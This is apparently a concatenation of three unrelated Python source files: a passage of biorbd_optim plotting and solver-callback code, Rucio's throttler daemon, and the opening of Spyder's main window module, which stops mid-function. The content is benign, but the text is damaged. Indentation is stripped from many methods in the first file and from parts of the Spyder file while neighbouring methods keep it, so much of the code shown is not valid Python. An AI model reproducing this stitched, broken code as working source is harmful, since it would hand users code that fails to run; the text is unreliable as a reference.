    :param axes_idx: Index of the axis to be mapped: None, a tuple/list of
        indices, or a Mapping instance.
    :param legend: Legend of the graphs.
    :param combine_to: Plot in which to add the graph.
    :param color: Color of the graphs.
    :param ylim: y-axis limits, if any.
    :param bounds: Bounds to draw on the plot, if any.
    """

    def __init__(
        self, update_function, plot_type=PlotType.PLOT, axes_idx=None, legend=(), combine_to=None, color=None, ylim=None, bounds=None,
    ):
        self.function = update_function
        self.type = plot_type
        if axes_idx is None:
            self.phase_mappings = None  # Will be set later
        elif isinstance(axes_idx, (tuple, list)):
            self.phase_mappings = Mapping(axes_idx)
        elif isinstance(axes_idx, Mapping):
            self.phase_mappings = axes_idx
        else:
            raise RuntimeError("phase_mapping must be a list or a Mapping")
        self.legend = legend
        self.combine_to = combine_to
        self.color = color
        self.ylim = ylim
        self.bounds = bounds
class PlotOcp:
def __init__(self, ocp, automatically_organize=True, adapt_graph_size_to_bounds=False):
"""Prepares the figure"""
for i in range(1, ocp.nb_phases):
if ocp.nlp[0]["nbQ"] != ocp.nlp[i]["nbQ"]:
raise RuntimeError("Graphs with nbQ different at each phase is not implemented yet")
self.ocp = ocp
self.plot_options = {
"general_options": {"use_tight_layout": False},
"non_integrated_plots": {"linestyle": "-.", "markersize": 3},
"integrated_plots": {"linestyle": "-", "markersize": 3, "linewidth": 1.1},
"bounds": {"color": "k", "linewidth": 0.4, "linestyle": "-"},
"grid": {"color": "k", "linestyle": "-", "linewidth": 0.15},
"vertical_lines": {"color": "k", "linestyle": "--", "linewidth": 1.2},
}
self.ydata = []
self.ns = 0
self.t = []
self.t_integrated = []
if isinstance(self.ocp.initial_phase_time, (int, float)):
self.tf = [self.ocp.initial_phase_time]
else:
self.tf = list(self.ocp.initial_phase_time)
self.t_idx_to_optimize = []
for i, nlp in enumerate(self.ocp.nlp):
if isinstance(nlp["tf"], self.ocp.CX):
self.t_idx_to_optimize.append(i)
self.__update_time_vector()
self.axes = {}
self.plots = []
self.plots_vertical_lines = []
self.plots_bounds = []
self.all_figures = []
self.automatically_organize = automatically_organize
self._organize_windows(len(self.ocp.nlp[0]["var_states"]) + len(self.ocp.nlp[0]["var_controls"]))
self.plot_func = {}
self.variable_sizes = []
self.adapt_graph_size_to_bounds = adapt_graph_size_to_bounds
self.__create_plots()
horz = 0
vert = 1 if len(self.all_figures) < self.nb_vertical_windows * self.nb_horizontal_windows else 0
for i, fig in enumerate(self.all_figures):
if self.automatically_organize:
try:
fig.canvas.manager.window.move(
int(vert * self.width_step), int(self.top_margin + horz * self.height_step)
)
vert += 1
if vert >= self.nb_vertical_windows:
horz += 1
vert = 0
except AttributeError:
pass
fig.canvas.draw()
if self.plot_options["general_options"]["use_tight_layout"]:
fig.tight_layout()
def __update_time_vector(self):
"""Sets x-axis array"""
self.t = []
self.t_integrated = []
last_t = 0
for phase_idx, nlp in enumerate(self.ocp.nlp):
nb_int_steps = nlp["nb_integration_steps"]
dt_ns = self.tf[phase_idx] / nlp["ns"]
time_phase_integrated = []
last_t_int = copy(last_t)
for _ in range(nlp["ns"]):
time_phase_integrated.append(np.linspace(last_t_int, last_t_int + dt_ns, nb_int_steps + 1))
last_t_int += dt_ns
self.t_integrated.append(time_phase_integrated)
self.ns += nlp["ns"] + 1
time_phase = np.linspace(last_t, last_t + self.tf[phase_idx], nlp["ns"] + 1)
last_t += self.tf[phase_idx]
self.t.append(time_phase)
    def __create_plots(self):
        """
        Create every figure, axis and placeholder line artist declared in the
        nlp["plot"] mapping of each phase; actual data is filled in later by
        update_data().
        """
        # First pass: determine how many components each plotted variable has
        variable_sizes = []
        for i, nlp in enumerate(self.ocp.nlp):
            variable_sizes.append({})
            if "plot" in nlp:
                for key in nlp["plot"]:
                    if isinstance(nlp["plot"][key], tuple):
                        nlp["plot"][key] = nlp["plot"][key][0]
                    if nlp["plot"][key].phase_mappings is None:
                        # Probe the plot function with zero-filled inputs to
                        # discover how many rows it outputs
                        size = (
                            nlp["plot"][key]
                            .function(np.zeros((nlp["nx"], 1)), np.zeros((nlp["nu"], 1)), np.zeros((nlp["np"], 1)))
                            .shape[0]
                        )
                        nlp["plot"][key].phase_mappings = Mapping(range(size))
                    else:
                        size = len(nlp["plot"][key].phase_mappings.map_idx)
                    if key not in variable_sizes[i]:
                        variable_sizes[i][key] = size
                    else:
                        variable_sizes[i][key] = max(variable_sizes[i][key], size)
        self.variable_sizes = variable_sizes
        if not variable_sizes:
            # No graph was setup in problem_type
            return
        # Second pass: create (or reuse) the axes and the empty line artists
        self.plot_func = {}
        for i, nlp in enumerate(self.ocp.nlp):
            for variable in self.variable_sizes[i]:
                nb = max(nlp["plot"][variable].phase_mappings.map_idx) + 1
                nb_cols, nb_rows = PlotOcp._generate_windows_size(nb)
                if nlp["plot"][variable].combine_to:
                    # Draw on the axes of another variable instead of new ones
                    self.axes[variable] = self.axes[nlp["plot"][variable].combine_to]
                    axes = self.axes[variable][1]
                elif i > 0 and variable in self.axes:
                    # Later phases reuse the axes created for an earlier phase
                    axes = self.axes[variable][1]
                else:
                    axes = self.__add_new_axis(variable, nb, nb_rows, nb_cols)
                    self.axes[variable] = [nlp["plot"][variable], axes]
                t = self.t[i]
                if variable not in self.plot_func:
                    self.plot_func[variable] = [None] * self.ocp.nb_phases
                self.plot_func[variable][i] = nlp["plot"][variable]
                mapping = self.plot_func[variable][i].phase_mappings.map_idx
                for ctr, k in enumerate(mapping):
                    ax = axes[k]
                    if k < len(self.plot_func[variable][i].legend):
                        axes[k].set_title(self.plot_func[variable][i].legend[k])
                    ax.grid(**self.plot_options["grid"])
                    ax.set_xlim(0, self.t[-1][-1])
                    if nlp["plot"][variable].ylim:
                        ax.set_ylim(nlp["plot"][variable].ylim)
                    elif self.adapt_graph_size_to_bounds and nlp["plot"][variable].bounds:
                        # Fix the y-range from the declared bounds (with margin)
                        if nlp["plot"][variable].bounds.type != InterpolationType.CUSTOM:
                            y_min = nlp["plot"][variable].bounds.min[ctr].min()
                            y_max = nlp["plot"][variable].bounds.max[ctr].max()
                        else:
                            nlp["plot"][variable].bounds.check_and_adjust_dimensions(len(mapping), nlp["ns"])
                            y_min = min([nlp["plot"][variable].bounds.min.evaluate_at(j)[k] for j in range(nlp["ns"])])
                            y_max = max([nlp["plot"][variable].bounds.max.evaluate_at(j)[k] for j in range(nlp["ns"])])
                        y_range, _ = self.__compute_ylim(y_min, y_max, 1.25)
                        ax.set_ylim(y_range)
                    # Create the line artists with placeholder zeros
                    zero = np.zeros((t.shape[0], 1))
                    plot_type = self.plot_func[variable][i].type
                    if plot_type == PlotType.PLOT:
                        color = self.plot_func[variable][i].color if self.plot_func[variable][i].color else "tab:green"
                        self.plots.append(
                            [plot_type, i, ax.plot(t, zero, color=color, zorder=0, **self.plot_options["non_integrated_plots"])[0]]
                        )
                    elif plot_type == PlotType.INTEGRATED:
                        color = self.plot_func[variable][i].color if self.plot_func[variable][i].color else "tab:brown"
                        # One line artist per shooting interval
                        plots_integrated = []
                        nb_int_steps = nlp["nb_integration_steps"]
                        for cmp in range(nlp["ns"]):
                            plots_integrated.append(
                                ax.plot(
                                    self.t_integrated[i][cmp],
                                    np.zeros(nb_int_steps + 1),
                                    color=color,
                                    **self.plot_options["integrated_plots"],
                                )[0]
                            )
                        self.plots.append([plot_type, i, plots_integrated])
                    elif plot_type == PlotType.STEP:
                        color = self.plot_func[variable][i].color if self.plot_func[variable][i].color else "tab:orange"
                        self.plots.append([plot_type, i, ax.step(t, zero, where="post", color=color, zorder=0)[0]])
                    else:
                        raise RuntimeError(f"{plot_type} is not implemented yet")
                for j, ax in enumerate(axes):
                    # Vertical markers at each phase transition
                    intersections_time = self.find_phases_intersections()
                    for time in intersections_time:
                        self.plots_vertical_lines.append(ax.axvline(time, **self.plot_options["vertical_lines"]))
                    if self.axes[variable][0].bounds:
                        # Draw the min/max bound staircases on this axis
                        if self.axes[variable][0].bounds.type == InterpolationType.EACH_FRAME:
                            ns = self.axes[variable][0].bounds.min.shape[1] - 1
                        else:
                            ns = nlp["ns"]
                        self.axes[variable][0].bounds.check_and_adjust_dimensions(
                            nb_elements=len(mapping), nb_shooting=ns
                        )
                        bounds_min = np.array(
                            [self.axes[variable][0].bounds.min.evaluate_at(k)[j] for k in range(ns + 1)]
                        )
                        bounds_max = np.array(
                            [self.axes[variable][0].bounds.max.evaluate_at(k)[j] for k in range(ns + 1)]
                        )
                        if bounds_min.shape[0] == nlp["ns"]:
                            # Repeat the last bound so the staircase spans all ns + 1 nodes
                            bounds_min = np.concatenate((bounds_min, [bounds_min[-1]]))
                            bounds_max = np.concatenate((bounds_max, [bounds_max[-1]]))
                        self.plots_bounds.append(
                            [ax.step(self.t[i], bounds_min, where='post', **self.plot_options["bounds"]), i]
                        )
                        self.plots_bounds.append(
                            [ax.step(self.t[i], bounds_max, where='post', **self.plot_options["bounds"]), i]
                        )
def __add_new_axis(self, variable, nb, nb_rows, nb_cols):
"""
Sets the axis of the plots.
:param variable: Variable to plot (integer)
:param nb: Number of the figure. ?? (integer)
:param nb_rows: Number of rows of plots in subplots. (integer)
:param nb_cols: Number of columns of plots in subplots. (integer)
:return: axes: Axes of the plots. (instance of subplot class)
"""
if self.automatically_organize:
self.all_figures.append(plt.figure(variable, figsize=(self.width_step / 100, self.height_step / 131)))
else:
self.all_figures.append(plt.figure(variable))
axes = self.all_figures[-1].subplots(nb_rows, nb_cols)
if isinstance(axes, np.ndarray):
axes = axes.flatten()
else:
axes = [axes]
for i in range(nb, len(axes)):
axes[i].remove()
axes = axes[:nb]
idx_center = nb_rows * nb_cols - int(nb_cols / 2) - 1
if idx_center >= len(axes):
idx_center = len(axes) - 1
axes[idx_center].set_xlabel("time (s)")
self.all_figures[-1].tight_layout()
return axes
def _organize_windows(self, nb_windows):
"""
Organizes esthetically the figure.
:param nb_windows: Number of variables to plot. (integer)
"""
self.nb_vertical_windows, self.nb_horizontal_windows = PlotOcp._generate_windows_size(nb_windows)
if self.automatically_organize:
height = tkinter.Tk().winfo_screenheight()
width = tkinter.Tk().winfo_screenwidth()
self.top_margin = height / 15
self.height_step = (height - self.top_margin) / self.nb_horizontal_windows
self.width_step = width / self.nb_vertical_windows
else:
self.top_margin = None
self.height_step = None
self.width_step = None
def find_phases_intersections(self):
"""Finds the intersection between phases"""
return list(accumulate(self.tf))[:-1]
    @staticmethod
    def show():
        """Display all created figures and block until they are closed."""
        plt.show()
    def update_data(self, V):
        """
        Refresh all plotted y-data from a new decision-variable vector V.

        Decodes V into states/controls/parameters, pushes optimized phase
        durations into self.tf, rebuilds the time axes, evaluates every
        registered plot function, then redraws the axes.
        """
        self.ydata = []
        data_states, data_controls, data_param = Data.get_data(
            self.ocp, V, get_parameters=True, integrate=True, concatenate=False
        )
        # All parameters except "time" are forwarded to the plot functions
        data_param_in_dyn = np.array([data_param[key] for key in data_param if key != "time"]).squeeze()
        # NOTE(review): this loop performs the exact same update once per
        # phase; a single pass would appear sufficient -- confirm intent.
        for _ in self.ocp.nlp:
            if self.t_idx_to_optimize:
                # Replace the phase durations being optimized with their
                # current values extracted from V
                for i_in_time, i_in_tf in enumerate(self.t_idx_to_optimize):
                    self.tf[i_in_tf] = data_param["time"][i_in_time]
            self.__update_xdata()
        data_states_per_phase, data_controls_per_phase = Data.get_data(self.ocp, V, integrate=True, concatenate=False)
        for i, nlp in enumerate(self.ocp.nlp):
            # Integrated data carries nb_integration_steps + 1 points per interval
            step_size = nlp["nb_integration_steps"] + 1
            nb_elements = nlp["ns"] * step_size + 1
            # Stack all state variables of this phase row-wise
            state = np.ndarray((0, nb_elements))
            for s in nlp["var_states"]:
                if isinstance(data_states_per_phase[s], (list, tuple)):
                    state = np.concatenate((state, data_states_per_phase[s][i]))
                else:
                    state = np.concatenate((state, data_states_per_phase[s]))
            # Controls exist only at the ns + 1 shooting nodes
            control = np.ndarray((0, nlp["ns"] + 1))
            for s in nlp["var_controls"]:
                if isinstance(data_controls_per_phase[s], (list, tuple)):
                    control = np.concatenate((control, data_controls_per_phase[s][i]))
                else:
                    control = np.concatenate((control, data_controls_per_phase[s]))
            # Number of control columns consumed per interval by the plot function
            if nlp["control_type"] == ControlType.CONSTANT:
                u_mod = 1
            elif nlp["control_type"] == ControlType.LINEAR_CONTINUOUS:
                u_mod = 2
            else:
                raise NotImplementedError(f"Plotting {nlp['control_type']} is not implemented yet")
            for key in self.variable_sizes[i]:
                if self.plot_func[key][i].type == PlotType.INTEGRATED:
                    # Evaluate the plot function on each interval separately
                    all_y = []
                    for idx, t in enumerate(self.t_integrated[i]):
                        y_tp = np.empty((self.variable_sizes[i][key], len(t)))
                        y_tp.fill(np.nan)
                        y_tp[:, :] = self.plot_func[key][i].function(
                            state[:, step_size * idx : step_size * (idx + 1)],
                            control[:, idx : idx + u_mod],
                            data_param_in_dyn,
                        )
                        all_y.append(y_tp)
                    # Regroup per plotted component: a list of interval arrays each
                    for idx in range(len(self.plot_func[key][i].phase_mappings.map_idx)):
                        y_tp = []
                        for y in all_y:
                            y_tp.append(y[idx, :])
                        self.__append_to_ydata([y_tp])
                else:
                    # Non-integrated plots are evaluated on shooting nodes only
                    y = np.empty((self.variable_sizes[i][key], len(self.t[i])))
                    y.fill(np.nan)
                    y[:, :] = self.plot_func[key][i].function(state[:, ::step_size], control, data_param_in_dyn)
                    self.__append_to_ydata(y)
        self.__update_axes()
    def __update_xdata(self):
        """Update of the time in plots (independent axis)."""
        self.__update_time_vector()
        for plot in self.plots:
            phase_idx = plot[1]
            if plot[0] == PlotType.INTEGRATED:
                # One line per shooting interval: shift each to its new window
                for cmp, p in enumerate(plot[2]):
                    p.set_xdata(self.t_integrated[phase_idx][cmp])
                ax = plot[2][-1].axes
            else:
                plot[2].set_xdata(self.t[phase_idx])
                ax = plot[2].axes
            # Stretch the x-axis to the (possibly re-optimized) total duration
            ax.set_xlim(0, self.t[-1][-1])
        if self.plots_bounds:
            for plot_bounds in self.plots_bounds:
                plot_bounds[0][0].set_xdata(self.t[plot_bounds[1]])
                ax = plot_bounds[0][0].axes
                ax.set_xlim(0, self.t[-1][-1])
        # Move the phase-transition markers; they are stored grouped as one
        # run of n lines per axis (see how they are created in __create_plots)
        intersections_time = self.find_phases_intersections()
        n = len(intersections_time)
        if n > 0:
            for p in range(int(len(self.plots_vertical_lines) / n)):
                for i, time in enumerate(intersections_time):
                    self.plots_vertical_lines[p * n + i].set_xdata([time, time])
def __append_to_ydata(self, data):
for y in data:
self.ydata.append(y)
    def __update_axes(self):
        """Push the freshly computed self.ydata into the line artists and rescale axes."""
        assert len(self.plots) == len(self.ydata)
        for i, plot in enumerate(self.plots):
            y = self.ydata[i]
            if plot[0] == PlotType.INTEGRATED:
                # One curve per shooting interval
                for cmp, p in enumerate(plot[2]):
                    p.set_ydata(y[cmp])
            else:
                plot[2].set_ydata(y)
        # Collapse the phase-transition markers to NaN before rescaling
        # (presumably so they do not influence the data range -- confirm)
        for p in self.plots_vertical_lines:
            p.set_ydata((np.nan, np.nan))
        for key in self.axes:
            if not self.adapt_graph_size_to_bounds:
                for i, ax in enumerate(self.axes[key][1]):
                    if not self.axes[key][0].ylim:
                        y_max = -np.inf
                        y_min = np.inf
                        children_list = [p for p in ax.get_children() if isinstance(p, lines.Line2D)]
                        # NOTE(review): the last two Line2D children are
                        # skipped -- looks like they are the vertical markers
                        # added per axis; verify against __create_plots.
                        for p in children_list[:-2]:
                            y_min = min(y_min, np.min(p.get_ydata()))
                            y_max = max(y_max, np.max(p.get_ydata()))
                        y_range, data_range = self.__compute_ylim(y_min, y_max, 1.25)
                        ax.set_ylim(y_range)
                        ax.set_yticks(np.arange(y_range[0], y_range[1], step=data_range / 4,))
        # Restore the markers to span the full axis height
        for p in self.plots_vertical_lines:
            p.set_ydata((0, 1))
@staticmethod
def __compute_ylim(min_val, max_val, threshold):
if np.isnan(min_val) or np.isinf(min_val):
min_val = 0
if np.isnan(max_val) or np.isinf(max_val):
max_val = 1
data_mean = np.mean((min_val, max_val))
data_range = max_val - min_val
if np.abs(data_range) < 0.8:
data_range = 0.8
y_range = (threshold * data_range) / 2
y_range = data_mean - y_range, data_mean + y_range
return y_range, data_range
@staticmethod
def _generate_windows_size(nb):
"""
Defines the number of column and rows of subplots in function of the number of variables to plot.
:param nb: Number of variables to plot. (integer)
:return: nb_rows: Number of rows of subplot. (integer)
"""
nb_rows = int(round(np.sqrt(nb)))
return nb_rows + 1 if nb_rows * nb_rows < nb else nb_rows, nb_rows
class ShowResult:
    """Front-end to visualize a solved OCP: static graphs or a 3D animation."""

    def __init__(self, ocp, sol):
        # ocp: the solved optimal control program
        # sol: solver output; only sol["x"] is used here
        self.ocp = ocp
        self.sol = sol

    def graphs(self, automatically_organize=True, adapt_graph_size_to_bounds=False):
        """Plot the solution with PlotOcp and block until the windows are closed."""
        plot_ocp = PlotOcp(self.ocp, automatically_organize=automatically_organize, adapt_graph_size_to_bounds=adapt_graph_size_to_bounds)
        plot_ocp.update_data(self.sol["x"])
        plt.show()

    def animate(self, nb_frames=80, **kwargs):
        """
        Animate solution with BiorbdViz
        :param nb_frames: Number of frames in the animation. (integer)
        Extra keyword arguments are forwarded to the BiorbdViz constructor.
        :raises RuntimeError: if BiorbdViz is not installed.
        """
        try:
            import BiorbdViz
        except ModuleNotFoundError:
            raise RuntimeError("BiorbdViz must be install to animate the model")
        check_version(BiorbdViz, "1.3.3", "1.4.0")
        data_interpolate, data_control = Data.get_data(
            self.ocp, self.sol["x"], integrate=False, interpolate_nb_frames=nb_frames
        )
        if not isinstance(data_interpolate["q"], (list, tuple)):
            # Single-phase solutions come back unwrapped; normalize to a list
            data_interpolate["q"] = [data_interpolate["q"]]
        all_bioviz = []
        for idx_phase, data in enumerate(data_interpolate["q"]):
            all_bioviz.append(BiorbdViz.BiorbdViz(loaded_model=self.ocp.nlp[idx_phase]["model"], **kwargs))
            all_bioviz[-1].load_movement(self.ocp.nlp[idx_phase]["q_mapping"].expand.map(data))
        # Keep refreshing every viewer until the user closes all windows
        b_is_visible = [True] * len(all_bioviz)
        while sum(b_is_visible):
            for i, b in enumerate(all_bioviz):
                if b.vtk_window.is_active:
                    b.update()
                else:
                    b_is_visible[i] = False

    @staticmethod
    def keep_matplotlib():
        """Open a tiny figure moved to (1000, 100) and block in plt.show()."""
        plt.figure(figsize=(0.01, 0.01)).canvas.manager.window.move(1000, 100)
        plt.show()
class OnlineCallback(Callback):
    """
    Casadi Callback that forwards each solver iterate (the V vector) through a
    multiprocessing pipe to a separate plotting process running PlotOcp.
    """

    def __init__(self, ocp, opts=None):
        """
        :param ocp: Optimal control program being solved (provides V and nlp data).
        :param opts: Options dict forwarded to casadi's Callback.construct.
        """
        # Fix: the original used the mutable default argument `opts={}`,
        # which is shared between all calls; use None as the sentinel instead.
        if opts is None:
            opts = {}
        Callback.__init__(self)
        self.nlp = ocp
        self.nx = ocp.V.rows()
        self.ng = 0
        self.construct("AnimateCallback", opts)

        # Pipe to the plotting process; eval() pushes each iterate into it
        self.plot_pipe, plotter_pipe = mp.Pipe()
        self.plotter = self.ProcessPlotter(ocp)
        self.plot_process = mp.Process(target=self.plotter, args=(plotter_pipe,), daemon=True)
        self.plot_process.start()

    @staticmethod
    def get_n_in():
        # One callback input per nlpsol output slot
        return nlpsol_n_out()

    @staticmethod
    def get_n_out():
        return 1

    @staticmethod
    def get_name_in(i):
        return nlpsol_out(i)

    @staticmethod
    def get_name_out(_):
        return "ret"

    def get_sparsity_in(self, i):
        """Declare the sparsity of each input the solver hands to the callback."""
        n = nlpsol_out(i)
        if n == "f":
            return Sparsity.scalar()
        elif n in ("x", "lam_x"):
            return Sparsity.dense(self.nx)
        elif n in ("g", "lam_g"):
            return Sparsity.dense(self.ng)
        else:
            return Sparsity(0, 0)

    def eval(self, arg):
        """Called by the solver at each iteration; ship the iterate to the plotter."""
        send = self.plot_pipe.send
        send(arg[0])
        return [0]

    class ProcessPlotter(object):
        """Target of the plotting process: owns a PlotOcp and polls the pipe."""

        def __init__(self, ocp):
            self.ocp = ocp

        def __call__(self, pipe):
            self.pipe = pipe
            self.plot = PlotOcp(self.ocp)
            # Poll the pipe every 100 ms from within the matplotlib event loop
            timer = self.plot.all_figures[0].canvas.new_timer(interval=100)
            timer.add_callback(self.callback)
            timer.start()
            plt.show()

        def callback(self):
            """Drain the pipe, update the plots and persist each iterate."""
            while self.pipe.poll():
                V = self.pipe.recv()
                self.plot.update_data(V)
                Iterations.save(V)
            for i, fig in enumerate(self.plot.all_figures):
                fig.canvas.draw()
            # Returning True keeps the timer alive
            return True
class Iterations:
    """Persists the solver iterates (V vectors) to a pickle file on disk."""

    @staticmethod
    def save(V):
        """
        Append V (converted to a numpy array) to the pickled list of previous
        iterations stored in .__tmp_biorbd_optim/temp_save_iter.bobo.

        Fix: the original only bound the history variable inside the
        `os.path.isfile` branch, so the very first call (no file yet) crashed
        with NameError; start from an empty history instead.
        """
        file_path = ".__tmp_biorbd_optim/temp_save_iter.bobo"
        previous_iterations = []
        if os.path.isfile(file_path):
            with open(file_path, "rb") as file:
                previous_iterations = pickle.load(file)
        previous_iterations.append(np.array(V))
        # NOTE(review): assumes the .__tmp_biorbd_optim directory already
        # exists -- presumably created by the caller; confirm.
        with open(file_path, "wb") as file:
            pickle.dump(previous_iterations, file)
|
throttler.py | # Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Vincent Garonne, <vincent.garonne@cern.ch>, 2012-2015
# - Mario Lassnig, <mario.lassnig@cern.ch>, 2013-2015
# - Cedric Serfon, <cedric.serfon@cern.ch>, 2013-2015
# - Wen Guan, <wen.guan@cern.ch>, 2014-2016
"""
Conveyor throttler is a daemon to manage rucio internal queue.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from rucio.common.config import config_get
from rucio.core import heartbeat
from rucio.daemons.conveyor.utils import schedule_requests
# Log to stdout at the level configured in the [common] section of the config
logging.basicConfig(stream=sys.stdout,
                    level=getattr(logging, config_get('common', 'loglevel').upper()),
                    format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
# Set by stop() to ask the daemon threads to exit their loops
graceful_stop = threading.Event()
def throttler(once=False, sleep_time=600):
    """
    Main loop to check rse transfer limits.

    :param once: If True, perform a single pass and return.
    :param sleep_time: Seconds to wait between scheduling passes.
    """
    logging.info('Throttler starting')

    executable = 'throttler'
    hostname = socket.getfqdn()
    pid = os.getpid()
    hb_thread = threading.current_thread()
    heartbeat.sanity_check(executable=executable, hostname=hostname)
    hb = heartbeat.live(executable, hostname, pid, hb_thread)
    logging.info('Throttler started - thread (%i/%i) timeout (%s)' % (hb['assign_thread'], hb['nr_threads'], sleep_time))

    current_time = time.time()
    while not graceful_stop.is_set():
        try:
            hb = heartbeat.live(executable, hostname, pid, hb_thread, older_than=3600)
            logging.info('Throttler - thread (%i/%i)' % (hb['assign_thread'], hb['nr_threads']))
            if hb['assign_thread'] != 0:
                # Only heartbeat-thread 0 does the scheduling; others idle
                logging.info('Throttler thread id is not 0, will sleep. Only thread 0 will work')
                while time.time() < current_time + sleep_time:
                    time.sleep(1)
                    if graceful_stop.is_set() or once:
                        break
                current_time = time.time()
                continue

            logging.info("Throttler thread %s - schedule requests" % hb['assign_thread'])
            schedule_requests()

            # Sleep in 1 s slices so a stop request is honoured promptly
            while time.time() < current_time + sleep_time:
                time.sleep(1)
                if graceful_stop.is_set() or once:
                    break
            current_time = time.time()
        except Exception:
            # Fix: was a bare `except:` which also swallowed SystemExit and
            # KeyboardInterrupt; also fixed the 'Throtter' typo in messages.
            logging.critical('Throttler thread %s - %s' % (hb['assign_thread'], traceback.format_exc()))
        if once:
            break

    logging.info('Throttler thread %s - graceful stop requested' % (hb['assign_thread']))
    heartbeat.die(executable, hostname, pid, hb_thread)
    logging.info('Throttler thread %s - graceful stop done' % (hb['assign_thread']))
def stop(signum=None, frame=None):
    """
    Graceful exit.

    Signature matches the signal-handler convention (signum, frame) so it can
    be registered directly; both arguments are ignored.
    """
    graceful_stop.set()
def run(once=False, sleep_time=600):
    """
    Starts up the conveyor throttler thread and waits for it to terminate.

    :param once: Forwarded to the throttler; perform a single pass when True.
    :param sleep_time: Seconds between scheduling passes.
    """
    threads = []
    logging.info('starting throttler thread')
    throttler_thread = threading.Thread(target=throttler, kwargs={'once': once, 'sleep_time': sleep_time})
    threads.append(throttler_thread)
    [t.start() for t in threads]

    logging.info('waiting for interrupts')

    # Interruptible joins require a timeout.
    # Fix: the original rebuilt `threads` from join()'s return value (None),
    # which made the loop exit after one ~3.14 s pass even while the thread
    # was still alive; keep the Thread objects and drop only finished ones.
    # Also: isAlive() was removed in Python 3.9 -> use is_alive().
    while threads:
        for t in threads:
            t.join(timeout=3.14)
        threads = [t for t in threads if t.is_alive()]
|
mainwindow.py | # -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific PYthon Development EnviRonment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
import atexit
import errno
import os
import os.path as osp
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import traceback
#==============================================================================
# Keeping a reference to the original sys.exit before patching it
#==============================================================================
ORIGINAL_SYS_EXIT = sys.exit
#==============================================================================
# Check requirements
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
#==============================================================================
# Windows only: support for hiding console window when started with python.exe
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Workaround: importing rope.base.project here, otherwise this module can't
# be imported if Spyder was executed from another folder than spyder
#==============================================================================
try:
import rope.base.project # analysis:ignore
except ImportError:
pass
#==============================================================================
# Qt imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant, getopenfilename, getsavefilename
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot)
from qtpy.QtGui import QColor, QDesktopServices, QKeySequence, QPixmap
from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow,
QMenu, QMessageBox, QShortcut, QSplashScreen,
QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
# when PySide is selected by the QT_API environment variable and when PyQt4
# is also installed (or any other Qt-based application prepending a directory
# containing incompatible Qt DLLs versions in PATH):
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
#==============================================================================
# Proper high DPI scaling is available in Qt >= 5.6.0. This attribute must
# be set before creating the application
#==============================================================================
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling, True)
#==============================================================================
# Create our QApplication instance here because it's needed to render the
# splash screen created below
#==============================================================================
from spyder.utils.qthelpers import qapplication
MAIN_APP = qapplication()
#==============================================================================
# Create splash screen out of MainWindow to reduce perceived startup time.
#==============================================================================
from spyder.config.base import _, get_image_path, DEV
# Build the splash screen from the bundled SVG and show it right away,
# before the heavy MainWindow imports/setup further down this module.
SPLASH = QSplashScreen(QPixmap(get_image_path('splash.svg'), 'svg'))
SPLASH_FONT = SPLASH.font()
SPLASH_FONT.setPixelSize(10)
SPLASH.setFont(SPLASH_FONT)
SPLASH.show()
SPLASH.showMessage(_("Initializing..."), Qt.AlignBottom | Qt.AlignCenter |
                   Qt.AlignAbsolute, QColor(Qt.white))
# Force Qt to paint the splash now; the event loop is not running yet
QApplication.processEvents()
#==============================================================================
# Local utility imports
#==============================================================================
from spyder import __version__, __project_url__, __forum_url__, get_versions
from spyder.config.base import (get_conf_path, get_module_data_path,
get_module_source_path, STDERR, DEBUG,
debug_print, MAC_APP_NAME, get_home_dir,
running_in_mac_app, get_module_path,
reset_config_files)
from spyder.config.main import CONF, OPEN_FILES_PORT
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.app.cli_options import get_options
from spyder import dependencies
from spyder.config.ipython import QTCONSOLE_INSTALLED
from spyder.config.user import NoDefault
from spyder.py3compat import (getcwd, is_text_string, to_text_string,
PY3, qbytearray_to_str, u, configparser as cp)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.introspection import module_completion
from spyder.utils.programs import is_module_installed
from spyder.utils.misc import select_port
#==============================================================================
# Local gui imports
#==============================================================================
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
try:
from spyder.utils.environ import WinUserEnvDialog
except ImportError:
WinUserEnvDialog = None # analysis:ignore
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri)
from spyder.config.gui import get_shortcut
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
#==============================================================================
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
#==============================================================================
CWD = getcwd()
#==============================================================================
# Spyder's main window widgets utilities
#==============================================================================
def get_python_doc_path():
    """
    Return Python documentation path as a file URI, or None if not found.
    (Windows: return the PythonXX.chm path if available)
    """
    if os.name == 'nt':
        doc_path = osp.join(sys.prefix, "Doc")
